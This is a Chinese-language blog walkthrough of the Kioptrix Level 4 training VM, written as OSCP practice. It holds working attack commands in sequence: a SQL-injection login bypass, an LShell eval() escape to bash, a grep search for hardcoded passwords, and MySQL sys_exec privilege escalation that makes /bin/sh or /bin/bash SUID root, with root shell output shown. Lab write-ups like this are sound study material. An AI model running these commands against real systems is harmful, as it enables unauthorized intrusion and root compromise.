OSCP(基础篇靶机Kioptrix Level 4)

 

 

第二步:enum4linux进行系统枚举  :(enum4linux IP地址)

得出存在用户有loneferret、john、robert

 

第三步:SQL注入SQLi   使用用户名:john                         万能密码尝试: ' or 1=1 #

 ssh john@192.168.56.106 -oHostKeyAlgorithms=+ssh-dss

 

第四步:本地提权(信息获取)

echo os.system('/bin/bash')    方式多样,我尝试这样获取ttyshell

 (备注:这似乎是一个问题,存在于LShell 0.9.15,易受攻击的函数被调用,用于检查用户是否被允许访问命令线上的给定路径。check_path();问题是,这个功能用作从命令线中剥离报价的手段,这很乐意执行任何有效的巨蛇表达。eval()

for item in line:

# remove potential quotes
try:
item = eval(item)
except:
pass

查看硬编码凭证,得出mysql root密码为空,而后进行服务验证与登录

find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null

 ps aux | grep mysql    服务已存在

 

Mysql提权:

http://itdrafts.blogspot.com/2014/11/mysql-root-to-system-root-with.html

https://rootrecipe.medium.com/mysql-to-system-root-ad8edc305d2b

第五步:利用mysql提权(方式1:利用mysql的sys_exec函数)

mysql -u root

use mysql;
select * from mysql.func;
select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh');

cd /tmp

./sh

 成功~

 

第五步:利用mysql提权(方式2:利用mysql create function sys_exec returns integer soname 'lib_mysqludf_sys.so')

mysql> use mysql;
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('chmod u+s /bin/bash');

bash-3.2$ ls -a /bin/bash
/bin/bash
bash-3.2$ ls -l /bin/bash
-rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
bash-3.2$ bash -p
bash-3.2# whoami
root

 

完结撒花~

 

posted @ 2023-12-02 17:53  justdoIT*  阅读(104)  评论(0)    收藏  举报